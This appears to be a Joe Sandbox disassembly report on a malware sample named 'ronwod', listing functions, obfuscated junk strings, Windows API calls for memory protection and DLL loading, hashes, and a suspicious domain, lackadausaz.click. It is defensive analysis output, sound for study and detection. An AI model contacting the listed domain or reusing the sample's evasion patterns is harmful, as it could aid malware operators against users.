VtSSXnNd, xrefs: 6C5251FF
fvVdtEYyAtzg, xrefs: 6C525A58
fe., xrefs: 6C5251C3
aOauEKMB, xrefs: 6C52536B
b, xrefs: 6C52531D
@, xrefs: 6C525CE3
yjrVGVjfbIpB, xrefs: 6C5259DD
< \l, xrefs: 6C525BE6
HTjGVHJfd, xrefs: 6C5252A2
Section last item indeed. Million fish budget everybody, xrefs: 6C525301

Memory Dump Source

Source File: 00000002.00000002.1818935697.000000006C521000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000002.00000002.1818919125.000000006C520000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1818951468.000000006C52A000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819015645.000000006C575000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819047037.000000006C5BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819061747.000000006C5C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819075730.000000006C5C4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819119862.000000006C5C7000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c520000_ronwod.jbxd

Yara matches

Similarity

API ID: MemoryVirtual$AllocateProtect
String ID: -$< \l$@$AKFJELa$Avoid or wif$Central nice light I well finally$CrqvGT$EJhHGmR$EyNqwGCPzUHW$FRjsvCUyOKFU$HTjGVHJfd$IhBeBowcYgRE$LDsJmNmy$MqrhQbj$New young her. Role ever old$SeIJrUWs$Section last item indeed. Million fish budget everybody$Truth think they push or. Fish w$UHMDZa$VApoEtMgLZ$VtSSXnNd$WPlwVTzy$War medical receiveAvoid or wif$YAUypMTMuW$[$aOauEKMB$b$eCKvXrCJRPK$eiwbYNn$ezFgPGo$fe.$fvVdtEYyAtzg$hPvMIxsUgRaN$idBFWFCLAT$nBHmnQYEVluy$ppWFQTeJs$tvXmLl$wor$yjrVGVjfbIpB
API String ID: 2931642484-3579324037
Opcode ID: f43eef970313472d47692122408440fbef58783d2a06f261728089a5b1f56da2
Instruction ID: 896e4e4363f1c4847b502cb681cd59c0c074aff25bcf1d898396d1c5a273fa71
Opcode Fuzzy Hash: f43eef970313472d47692122408440fbef58783d2a06f261728089a5b1f56da2
Instruction Fuzzy Hash: 22B2ADB5E146199FCB54CFA8D981ACDBBF1FF88304F1085AAE458EB250D734AA84CF51

Function 6C5271D6 Relevance: 57.3, Strings: 45, Instructions: 1043
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

FpQdOLXyzFVw, xrefs: 6C527974
OJaxWyYace, xrefs: 6C527A5A
DyixnSQ, xrefs: 6C527416
onaEpEgwa, xrefs: 6C527E67
Week student tree war picture pressure when want. East great one, xrefs: 6C527C40
urhpKAOhp, xrefs: 6C527DF1
hHsduvcWOAP, xrefs: 6C52741E
DcACwIVPcfwx, xrefs: 6C5282D2
ECtgqOIr, xrefs: 6C528136
iyPqIyT, xrefs: 6C5276B1
XiOrctlWiLa, xrefs: 6C527D40
iQJQDnkgt, xrefs: 6C52808F
tCcFDjVUpa, xrefs: 6C52825A
ntdll.dll, xrefs: 6C527AF6
ZfMCsst, xrefs: 6C527715
Everyone create fly save., xrefs: 6C527D50
wiJnEOXp, xrefs: 6C52750D
wyGcYFWVIzh, xrefs: 6C5273CE
Quickly sign every he, xrefs: 6C5273BC
iJJyTOEdB, xrefs: 6C527DE9
o, xrefs: 6C5272B9
cFaQurZgqGG, xrefs: 6C5273C6
gGTZLV, xrefs: 6C527367
Away really sure shake.Coach test your I. Hospital finish yo, xrefs: 6C52736F
qvxlUV, xrefs: 6C52769B
eTPTzpJZQ, xrefs: 6C5282DA
ZwGjfHTuP, xrefs: 6C527A41
TpYPJeUFXio, xrefs: 6C527962
jwiakgKt, xrefs: 6C52823E
Major thousand response. Run pa, xrefs: 6C527D62
JjFjbUdY, xrefs: 6C527675
usi, xrefs: 6C527255
VZBLHFHriEo, xrefs: 6C527A05
miawrsAFAJ, xrefs: 6C5273AD
FPYJOdwK, xrefs: 6C5280E6
SRBiCy, xrefs: 6C528097
IELWhq, xrefs: 6C528073
kernel32.dll, xrefs: 6C527A86
W_, xrefs: 6C5282CA
cGKtqhtkHoB, xrefs: 6C5282C2
iwqcUwhHdXVb, xrefs: 6C527515
Fund community happy , xrefs: 6C527F67
abXCysdwi, xrefs: 6C5278C1
RJNtIEt, xrefs: 6C5278B9
Book particular page research bu, xrefs: 6C527437

Memory Dump Source

Source File: 00000002.00000002.1818935697.000000006C521000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000002.00000002.1818919125.000000006C520000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1818951468.000000006C52A000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819015645.000000006C575000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819047037.000000006C5BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819061747.000000006C5C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819075730.000000006C5C4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819119862.000000006C5C7000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c520000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: Away really sure shake.Coach test your I. Hospital finish yo$Book particular page research bu$DcACwIVPcfwx$DyixnSQ$ECtgqOIr$Everyone create fly save.$FPYJOdwK$FpQdOLXyzFVw$Fund community happy $IELWhq$JjFjbUdY$Major thousand response. Run pa$OJaxWyYace$Quickly sign every he$RJNtIEt$SRBiCy$TpYPJeUFXio$VZBLHFHriEo$W_$Week student tree war picture pressure when want. East great one$XiOrctlWiLa$ZfMCsst$ZwGjfHTuP$abXCysdwi$cFaQurZgqGG$cGKtqhtkHoB$eTPTzpJZQ$gGTZLV$hHsduvcWOAP$iJJyTOEdB$iQJQDnkgt$iwqcUwhHdXVb$iyPqIyT$jwiakgKt$kernel32.dll$miawrsAFAJ$ntdll.dll$o$onaEpEgwa$qvxlUV$tCcFDjVUpa$urhpKAOhp$usi$wiJnEOXp$wyGcYFWVIzh
API String ID: 0-259308127
Opcode ID: c3dadc1e637d056fe99c7dcde07f631c028f0263415fd85a3ad49d32b893a810
Instruction ID: 9f0567cc68f82fe7e0f43c747d192afdc63b7dd11036fc09f636013dad83af5c
Opcode Fuzzy Hash: c3dadc1e637d056fe99c7dcde07f631c028f0263415fd85a3ad49d32b893a810
Instruction Fuzzy Hash: F6D29FB5E152598FCB60CFA8C985BCEBBF1BF48304F1085AAE458E7251D734AA84CF51

Function 6C523B00 Relevance: 52.8, APIs: 1, Strings: 29, Instructions: 317
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 6C5240A2

Strings

zCBOBeXh, xrefs: 6C523CC4
ImDUkYAy, xrefs: 6C523E33
UsNPQZvqxZQa, xrefs: 6C523E19
KVGLhwqVHP, xrefs: 6C523DAA
saf, xrefs: 6C523C95
nder, xrefs: 6C523CA9
QLtNtFEmcnrA, xrefs: 6C523F5E
Begin account health center onto , xrefs: 6C523CEB
ToHGOYxVM, xrefs: 6C523FEB
e wo, xrefs: 6C523C9F
r ri, xrefs: 6C523C3B
date, xrefs: 6C523C59
an. , xrefs: 6C523C6D
reer, xrefs: 6C523C8B
Thei, xrefs: 6C523C31
ch c, xrefs: 6C523C45
t t, xrefs: 6C523B64
yZADxxnQDRrv, xrefs: 6C523FD4
GMWuCf, xrefs: 6C523F89
andi, xrefs: 6C523C4F
wom, xrefs: 6C523C63
t ca, xrefs: 6C523C81
@, xrefs: 6C524083
the, xrefs: 6C523CB3
Ready different interest, xrefs: 6C523DBA
OsGFGdECry, xrefs: 6C523EB9
Fron, xrefs: 6C523C77
xqytTsZYvUv, xrefs: 6C523DB2
Tend blue change far almost. Nor move any number its., xrefs: 6C523CF5

Memory Dump Source

Source File: 00000002.00000002.1818935697.000000006C521000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000002.00000002.1818919125.000000006C520000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1818951468.000000006C52A000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819015645.000000006C575000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819047037.000000006C5BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819061747.000000006C5C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819075730.000000006C5C4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819119862.000000006C5C7000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c520000_ronwod.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID: saf$ the$ wom$@$Begin account health center onto $Fron$GMWuCf$ImDUkYAy$KVGLhwqVHP$OsGFGdECry$QLtNtFEmcnrA$Ready different interest$Tend blue change far almost. Nor move any number its.$Thei$ToHGOYxVM$UsNPQZvqxZQa$an. $andi$ch c$date$e wo$nder$r ri$reer$t ca$t t$xqytTsZYvUv$yZADxxnQDRrv$zCBOBeXh
API String ID: 2706961497-1282299629
Opcode ID: 6c9e0bd02b6630e920ba7282f8b385cead1f4dc6a43cdeef7291d378832f4474
Instruction ID: 1c219c78888586c098cdd271e363b3b91798c129bd53ae31817686663d4f4ef7
Opcode Fuzzy Hash: 6c9e0bd02b6630e920ba7282f8b385cead1f4dc6a43cdeef7291d378832f4474
Instruction Fuzzy Hash: AB0290B1D1465A8FCB10CFA8C986BDEBBF0FF48300F1085AAD458AB250D7789A85CF55

Function 6C526371 Relevance: 45.8, APIs: 1, Strings: 25, Instructions: 326
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL ref: 6C526957

Strings

Trade local knowledge billion truthSeem while t, xrefs: 6C5265B0
kNCKMpfOdeas, xrefs: 6C5266CB
qPPGBxW, xrefs: 6C5266C3
cmd.exe, xrefs: 6C5268F8
McrlMIaapz, xrefs: 6C526761
yXDYUWKhH, xrefs: 6C526771
bQWTySIZS, xrefs: 6C5266D3
lSftaNkWSGmG, xrefs: 6C526812
JxVnUT, xrefs: 6C526553
VvmUlIEyNrq, xrefs: 6C526780
JioVBURU, xrefs: 6C526802
OKSygvK, xrefs: 6C526544
mic, xrefs: 6C52641A
AhCikbqNs, xrefs: 6C5265DB
YOanwoVESevf, xrefs: 6C5265CC
Them reach first staff around attack audience. Expect econom, xrefs: 6C5266E3
he , xrefs: 6C526518
le t, xrefs: 6C526435
NDVehSaEiara, xrefs: 6C52666E
BUysrwGWku, xrefs: 6C5266DB
gCZfoashBb, xrefs: 6C5267E9
Business situation add ball feeling. Issue of sh, xrefs: 6C52653A
kLkDKcCZPHHD, xrefs: 6C526666
C, xrefs: 6C52665E
aDtQXxihZ, xrefs: 6C52652A

Memory Dump Source

Source File: 00000002.00000002.1818935697.000000006C521000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000002.00000002.1818919125.000000006C520000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1818951468.000000006C52A000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819015645.000000006C575000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819047037.000000006C5BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819061747.000000006C5C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819075730.000000006C5C4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819119862.000000006C5C7000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c520000_ronwod.jbxd

Yara matches

Similarity

API ID: Load
String ID: AhCikbqNs$BUysrwGWku$Business situation add ball feeling. Issue of sh$C$JioVBURU$JxVnUT$McrlMIaapz$NDVehSaEiara$OKSygvK$Them reach first staff around attack audience. Expect econom$Trade local knowledge billion truthSeem while t$VvmUlIEyNrq$YOanwoVESevf$aDtQXxihZ$bQWTySIZS$cmd.exe$gCZfoashBb$he $kLkDKcCZPHHD$kNCKMpfOdeas$lSftaNkWSGmG$le t$mic$qPPGBxW$yXDYUWKhH
API String ID: 2234796835-1468478826
Opcode ID: b51b21d23a2bdb9b0450a5362d8bff654c712c9aafc1d74782683cb9c74c36cd
Instruction ID: 98b4a1ac8656d5d240a6c50999dfaa4877eb3964ec8600ae91185721d4a65f6f
Opcode Fuzzy Hash: b51b21d23a2bdb9b0450a5362d8bff654c712c9aafc1d74782683cb9c74c36cd
Instruction Fuzzy Hash: F60290B1E1421ACFCB50CFA8C982B9EBBF0BF48704F10856AE458EB255D7349A45CF56

Function 00A1346D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 373
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EMuqdKRvBcgQuKOr.CR ref: 00A13AF6

Strings

XJSRBDxKyaSs, xrefs: 00A1361D
Office should Congress most rich likely large. Church ev, xrefs: 00A135EB
xvSnPeDynuj, xrefs: 00A13698
hvaeczrruYw, xrefs: 00A13953
rwsGuyqwzAP, xrefs: 00A1373F
ANHeIue, xrefs: 00A137C3
Everything style, xrefs: 00A1366F
7, xrefs: 00A13840
yZasTv, xrefs: 00A13603
kiwvMKnkoz, xrefs: 00A13933
"s, xrefs: 00A1391B
e f, xrefs: 00A135E1
Area possible always matter his vote, xrefs: 00A13613
==, xrefs: 00A134B9
ver, xrefs: 00A1357D
rbxMMVTPRX, xrefs: 00A13A13
XkzrMvTaZ, xrefs: 00A136DD
WlLIBtD, xrefs: 00A136D5
FIXGDzM, xrefs: 00A136F5
ISAwZDVYrka, xrefs: 00A1394B
XSKIHuymetD, xrefs: 00A137CB
cJEqBOnCxLkR, xrefs: 00A1360B
e o, xrefs: 00A134EA

Memory Dump Source

Source File: 00000002.00000002.1818028568.0000000000A11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.1818009862.0000000000A10000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818070243.0000000000A16000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818091923.0000000000A19000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818105077.0000000000A1C000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818120780.0000000000A1D000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_ronwod.jbxd

Similarity

API ID: Muqd
String ID: "s$7$==$ANHeIue$Area possible always matter his vote$Everything style$FIXGDzM$ISAwZDVYrka$Office should Congress most rich likely large. Church ev$WlLIBtD$XJSRBDxKyaSs$XSKIHuymetD$XkzrMvTaZ$cJEqBOnCxLkR$e f$e o$hvaeczrruYw$kiwvMKnkoz$rbxMMVTPRX$rwsGuyqwzAP$ver$xvSnPeDynuj$yZasTv
API String ID: 1727731889-288809459
Opcode ID: af3125999ba1138583a9fa33564901442ac2c30e4310eaa2bf9c36bd1f252f01
Instruction ID: 54ec3488f35db58698774fcdd11a0598a5f9bad50f9d0411483f9baabe532826
Opcode Fuzzy Hash: af3125999ba1138583a9fa33564901442ac2c30e4310eaa2bf9c36bd1f252f01
Instruction Fuzzy Hash: C422BCB1D146199FCB10CFA8D985ACEBBF0FF48300F10896AE458EB251D778AA85CF55

Function 0144CC75 Relevance: 30.2, Strings: 24, Instructions: 243
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Kh^h, xrefs: 0144CF25
ph8h, xrefs: 0144CE5F
yhrh, xrefs: 0144CEA1
vh}h, xrefs: 0144CE49
fhch, xrefs: 0144CE96
0h+h, xrefs: 0144CE80
<h7h, xrefs: 0144CF46
Ehph, xrefs: 0144CF66
ohuh, xrefs: 0144CE54
uhjh, xrefs: 0144CEB7
`h,h, xrefs: 0144CECD
^hYh, xrefs: 0144CF0F
xhdh, xrefs: 0144CE75
hh(h, xrefs: 0144CEC2
FhFh, xrefs: 0144CF30
HhPh, xrefs: 0144CEEE
shoh, xrefs: 0144CEAC
ChYh, xrefs: 0144CF1A
uheh, xrefs: 0144CE8B
ehdh, xrefs: 0144CED8
RhTh, xrefs: 0144CEF9
Xh h, xrefs: 0144CF3B
lackadausaz.click, xrefs: 0144D003
Rhvh, xrefs: 0144CE6A

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: 0h+h$<h7h$ChYh$Ehph$FhFh$HhPh$Kh^h$RhTh$Rhvh$Xh h$^hYh$`h,h$ehdh$fhch$hh(h$lackadausaz.click$ohuh$ph8h$shoh$uheh$uhjh$vh}h$xhdh$yhrh
API String ID: 0-3755386291
Opcode ID: 4486366ffc78821f190f23b6dacdaf7c3f79c61b91bc3dea698031c44d14e9a2
Instruction ID: 2c30b15bcae3476d1669bfbb9c8d32233a8ed835df8519afc20010f6e9425bd5
Opcode Fuzzy Hash: 4486366ffc78821f190f23b6dacdaf7c3f79c61b91bc3dea698031c44d14e9a2
Instruction Fuzzy Hash: E981FFB190E3D08BE7318F29D5893ABBBE1EFC6300F69495DC1C85B261EB750516CB52

Function 01449C6F Relevance: 6.4, Strings: 5, Instructions: 150
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

7XvX, xrefs: 01449DA6
%X:X, xrefs: 01449D9C
)XPX, xrefs: 01449D92
IX6X, xrefs: 01449DB0
&XSX, xrefs: 01449D88

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: %X:X$&XSX$)XPX$7XvX$IX6X
API String ID: 0-642955395
Opcode ID: 4699dd49c0e3c70a0b29d995a4d92cc8a5e322a20cb20fff1a63b2597d2bc459
Instruction ID: e5342ab8ff1a88e6a5395fe05af20d13c1ff118223123d3cc575093477df7da0
Opcode Fuzzy Hash: 4699dd49c0e3c70a0b29d995a4d92cc8a5e322a20cb20fff1a63b2597d2bc459
Instruction Fuzzy Hash: 58417973E107168BEB54CFA5CC847EABB76FB92B00F1581AC8618A7644EB749652CF40

Function 0144A8B0 Relevance: 4.1, Strings: 3, Instructions: 349
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ok, xrefs: 0144AAC3
F>]>, xrefs: 0144A97F
j>a>, xrefs: 0144AA0F

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: F>]>$j>a>$ok
API String ID: 0-2883800044
Opcode ID: 79079a4209badc317a5c6c449f359feca672051f89dc77e897437d4fc6ce51ce
Instruction ID: 6ef37bbc8ce30714882001035962db3cb6106da56a0ab0a566bdd08ab7f8ecf5
Opcode Fuzzy Hash: 79079a4209badc317a5c6c449f359feca672051f89dc77e897437d4fc6ce51ce
Instruction Fuzzy Hash: 6AB1047254C3518BE328CF19C45116FBBF2EFD1304F25482DEAD69B360D239990ACB9A

Function 0147D0D9 Relevance: 2.6, Strings: 2, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

9., xrefs: 0147D150
9., xrefs: 0147D200

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: 9.$9.
API String ID: 2994545307-2940951921
Opcode ID: 621129707e8ffb10cfbaec2c2d702026f57dc1930b4e97d36bb7fc0fa0b7289d
Instruction ID: 95c3d072f1482b8a2cc9d65f61ff20b949c2d45ebb097eea52612539694d3872
Opcode Fuzzy Hash: 621129707e8ffb10cfbaec2c2d702026f57dc1930b4e97d36bb7fc0fa0b7289d
Instruction Fuzzy Hash: 47412071E245216FE3249A2CCD5077BB792EFC9715F19D639DA84E73E9DA31A8008780

Function 0147CD20 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0148009B,?,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0147CD4E

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 014800C0 Relevance: 1.4, Strings: 1, Instructions: 134COMMON

Download Yara Rule

Strings

@, xrefs: 01480172

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: 29858033d973989e6c01ff7ce9e6a360ad68839aada92b141c5336a1c0d56c6b
Instruction ID: b8280fc3053d0e3e1b586c604060ff072b0ecad6aa771e54c2751e6ef097b44c
Opcode Fuzzy Hash: 29858033d973989e6c01ff7ce9e6a360ad68839aada92b141c5336a1c0d56c6b
Instruction Fuzzy Hash: 114154B09183008BD714DF18D880A6FB7E1FFD5728F05892DE9895B3B0E7769809C782

Function 0147D9C1 Relevance: 1.4, Strings: 1, Instructions: 132COMMON

Download Yara Rule

Strings

@, xrefs: 0147DA4D

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: 00c3184a7606a5ddccc17ed6c3b77f2cb2180911d4d2302da3a02fe3b8b85c15
Instruction ID: c4c146b1138c2cd1abcef7d151f15748b7f9830609bd82f58f5efa10ce22144c
Opcode Fuzzy Hash: 00c3184a7606a5ddccc17ed6c3b77f2cb2180911d4d2302da3a02fe3b8b85c15
Instruction Fuzzy Hash: 3A4125B0A282119FE728CF28C95077F76E2FFD5704F14992EE581A73A8E7319804C792

Function 014486C0 Relevance: 7.6, APIs: 5, Instructions: 92
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 014486E2
GetCurrentThreadId.KERNEL32 ref: 014486E8
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 014486F9
GetForegroundWindow.USER32 ref: 014487BA
ExitProcess.KERNEL32 ref: 014487F9

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: 6df1ff3526484036b968b17373a269f9aff88c65766ccd6edcaf2cb4cc5a5e16
Instruction ID: 3308245de4d6868f36d98effbdc943f741120e773231ffde1ce9b13732f2af3c
Opcode Fuzzy Hash: 6df1ff3526484036b968b17373a269f9aff88c65766ccd6edcaf2cb4cc5a5e16
Instruction Fuzzy Hash: 90215A71A002115BF324FF75DC0ABAE7A929BD0715F0D842ED981DB3B9DA784402C392

Function 0144E6BA Relevance: 2.5, APIs: 2, Instructions: 12
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.OLE32 ref: 0144E6BA
CoUninitialize.COMBASE ref: 0144E6C0

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID: Uninitialize
String ID:
API String ID: 3861434553-0
Opcode ID: b09a48b0f7300cfca9ff56a9b8ccc0f72fddfa539fe1ac563e9f23ba93fbc9db
Instruction ID: 5f2b24551696fe48c5fb15631d215c53ad6a7fac877da8bc1814afcafd064d85
Opcode Fuzzy Hash: b09a48b0f7300cfca9ff56a9b8ccc0f72fddfa539fe1ac563e9f23ba93fbc9db
Instruction Fuzzy Hash: D7D09276611041CBD3698E24E968A9C3BA2B7893123198A6C94038266CDF70A445CB00

Function 01476B2D Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 01476B5E

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID: DefaultLanguageUser
String ID:
API String ID: 95929093-0
Opcode ID: c6c439d2c83c080e2696c1899ddac0c29a006d81c218cf91b8469986bebe538b
Instruction ID: 900d93a409f5281b7b3a59aefe8a68f4ab1eff566b460e2222263a77aea89d16
Opcode Fuzzy Hash: c6c439d2c83c080e2696c1899ddac0c29a006d81c218cf91b8469986bebe538b
Instruction Fuzzy Hash: E1112972F116148BE718CA68CD916FE67F3AFDD305F2A807EC449A73A9D93C4A418711

Function 0144CC13 Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0144CC25

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 7d924e89d8cfc2679934add6f9e74fbaafb4f1163dc74663c565e58f55007570
Instruction ID: 70778842e2721787730ee1cc7dc91d720556b584985093b737827cf5e0824d6c
Opcode Fuzzy Hash: 7d924e89d8cfc2679934add6f9e74fbaafb4f1163dc74663c565e58f55007570
Instruction Fuzzy Hash: 7BE092767E06053AF26C4429DC37F5C115357C0B11F38C35CB312292DCC6B4A4028204

Function 0147CE81 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0147CE9A

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: a202d1254473a6a9f47092db0dc8c7a8b6bb8ca5c619b0e60ef9afdadfd51b7c
Instruction ID: f3945643fe977c1b8eaca22ec9d6c43ffd893c23b6a664312e4a83f7f96707a3
Opcode Fuzzy Hash: a202d1254473a6a9f47092db0dc8c7a8b6bb8ca5c619b0e60ef9afdadfd51b7c
Instruction Fuzzy Hash: 7CE08CB9A902429FC710DF18FC4186D37E4EF68209708042EE242C333AD636E506CB00

Function 0144CBE0 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0144CBF3

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: e3bd4020aa1148b50ca4b11e2452c5e80dedc32e0037b4bd52bc6a6a378ef93a
